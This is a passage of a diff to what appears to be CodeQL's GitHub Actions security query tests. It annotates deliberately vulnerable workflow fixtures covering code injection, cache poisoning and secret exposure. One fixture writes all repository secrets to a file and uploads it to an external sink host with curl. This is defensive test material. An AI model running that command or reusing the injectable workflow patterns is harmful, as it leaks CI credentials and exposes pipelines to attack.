| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref index f7ce5674994d..5717bcec7322 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionMedium.ql +query: Security/CWE-094/CodeInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml index 5153e2cc7804..34b85a6bd831 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml @@ -14,8 +14,8 @@ jobs: - uses: actions/download-artifact@v3 # SECURE - uses: actions/download-artifact@v3.0.2 # SECURE - uses: actions/download-artifact@v4.1.0 - - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 - - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE + - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 # $ Alert + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE # $ Alert - uses: actions/download-artifact@v4 # SECURE - uses: actions/download-artifact@v4.1.7 # SECURE - uses: actions/download-artifact@v4.1.8 # SECURE diff --git a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref index c9bd66e4dd06..fe1d219fbffa 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -1,2 +1,2 @@ -Security/CWE-1395/UseOfKnownVulnerableAction.ql - +query: Security/CWE-1395/UseOfKnownVulnerableAction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml index ed496f3eeb29..657204ffd536 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml @@ -13,4 +13,4 @@ jobs: with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 59b58e03be78..75bf3897164a 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | edges nodes | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths -#select -| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref index c750afbeaf4a..48ae5cf9646b 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-200/SecretExfiltration.ql - +query: experimental/Security/CWE-200/SecretExfiltration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml index f000ad6a287a..2ee5623b64cf 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml @@ -6,5 +6,5 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml index 6530bd5f08e0..a26e39cbda0e 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/ai-inference + - uses: actions/ai-inference # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml index 6f7844f17cb2..4db5fc755232 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - test: + test: # $ Alert name: Build and test runs-on: ubuntu-latest permissions: {} diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml index 4353c2804976..c5448530fbb9 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -7,6 +7,6 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml index 2824ca14a7e1..ae9514f93e67 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml @@ -8,6 +8,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - - uses: actions/jekyll-build-pages + - uses: actions/jekyll-build-pages # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml index 0ec255f0d109..85434ad03460 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/add-to-project@v2 + - uses: actions/add-to-project@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml index 1a10bd6a7d6c..137fa791353c 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/deploy-pages + - uses: actions/deploy-pages # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml index b6ae16bf9e26..8981c8663825 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/delete-package-versions + - uses: actions/delete-package-versions # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref index ad1c6a996609..6837eb5124c9 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -1,2 +1,2 @@ -Security/CWE-275/MissingActionsPermissions.ql - +query: Security/CWE-275/MissingActionsPermissions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 37eb2bddb58c..24ad2ff91c80 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -8,13 +8,13 @@ jobs: runs-on: [self-hosted, X64, Linux, 16c32g] steps: - run: cmd - test2: + test2: # $ Alert runs-on: group: my-group labels: [self-hosted, label-1] steps: - run: cmd - test3: + test3: # $ Alert runs-on: - 'self-hosted' - 'linux' @@ -22,11 +22,11 @@ jobs: - 'metal' steps: - run: echo "foo" - test4: + test4: # $ Alert runs-on: self-hosted-azure steps: - run: cmd - test5: + test5: # $ Alert strategy: fail-fast: false matrix: @@ -63,7 +63,7 @@ jobs: runs-on: ${{ matrix.os }} steps: - run: cmd - test8: + test8: # $ Alert strategy: matrix: settings: @@ -75,14 +75,14 @@ jobs: runs-on: ${{ matrix.settings.host }} steps: - run: cmd - test9: + test9: # $ Alert strategy: matrix: os: ${{ github.repository }} runs-on: ${{ matrix.os }} steps: - run: cmd - test10: + test10: # $ Alert strategy: matrix: os: ${{ github.repository }} @@ -91,4 +91,4 @@ jobs: baz: "asdf" runs-on: ${{ matrix.foo.bar }} steps: - - run: cmd + - run: cmd # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref index dc99068b3035..3c21812c0e7a 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref +++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql - +query: experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml index 48833460b44b..4c8aa982c31a 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -17,4 +17,4 @@ jobs: if: contains(github.event.pull_request.labels.*.name, 'safe to test') with: ref: ${{ github.event.pull_request.head.ref }} - - run: ./cmd + - run: ./cmd # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref index 09a19f21e3cb..c62fedc2e7d8 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref +++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -1,2 +1,2 @@ -Security/CWE-285/ImproperAccessControl.ql - +query: Security/CWE-285/ImproperAccessControl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index 473d59986957..4d09af11cfd5 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -11,7 +11,7 @@ jobs: with: name: file path: . - test2: # NOT VULNERABLE + test2: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -29,7 +29,7 @@ jobs: with: name: file path: "*" - test4: # VULNERABLE + test4: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -40,7 +40,7 @@ jobs: with: name: file path: foo - test5: # VULNERABLE + test5: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -51,7 +51,7 @@ jobs: with: name: file path: foo/* - test6: # NOT VULNERABLE + test6: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -83,5 +83,5 @@ jobs: uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 with: name: file - path: . + path: . # $ Alert[actions/secrets-in-artifacts] diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml index 614efab34c98..d476fab3ce46 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml @@ -9,17 +9,17 @@ jobs: TOKENS: [WRITE, READ] steps: - run: | - echo '${{ toJSON(secrets) }}' > secrets.txt + echo '${{ toJSON(secrets) }}' > secrets.txt # $ Alert[actions/excessive-secrets-exposure] curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com - env: - ALL_SECRETS: ${{ toJSON(secrets) }} + ALL_SECRETS: ${{ toJSON(secrets) }} # $ Alert[actions/excessive-secrets-exposure] run: echo "$ALL_SECRETS" - env: - SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} # $ Alert[actions/excessive-secrets-exposure] run: echo "$SOME_SECRETS" - env: - username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} - password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} # $ Alert[actions/unmasked-secret-exposure] + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} # $ Alert[actions/unmasked-secret-exposure] run: | echo "$username" echo "$password" diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref index 45f5ad80fd98..2341eea4546e 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/ExcessiveSecretsExposure.ql - +query: Security/CWE-312/ExcessiveSecretsExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref index c9bb538a12d3..ea9ad38301f2 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/SecretsInArtifacts.ql - +query: Security/CWE-312/SecretsInArtifacts.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref index ad4c84615237..be8a489a18b4 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/UnmaskedSecretExposure.ql - +query: Security/CWE-312/UnmaskedSecretExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml index 9f19634abc92..ffd8410a1a86 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml @@ -8,5 +8,5 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo ${{ github.event.comment.body }} + echo ${{ github.event.comment.body }} # $ Alert[actions/cache-poisoning/code-injection] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml index 55efe8e9fec9..7d6556c97c05 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml @@ -15,9 +15,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml index eb6373a406eb..a6413290212a 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml @@ -11,9 +11,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml index 3849d92cbcca..85a8d067f604 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml @@ -16,9 +16,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml index d3f51456de2d..896c22d9243c 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml index ec0f9b0e6c94..1faedcf1b916 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index b9652d46b59f..a17b62dbafff 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Set up Python 3.10 + - name: Set up Python 3.10 # $ Source[actions/cache-poisoning/direct-cache] uses: actions/setup-python@v5 with: python-version: "3.10" @@ -23,4 +23,4 @@ jobs: with: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} - restore-keys: ${{ runner.os }}-pip- + restore-keys: ${{ runner.os }}-pip- # $ Alert[actions/cache-poisoning/direct-cache] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml 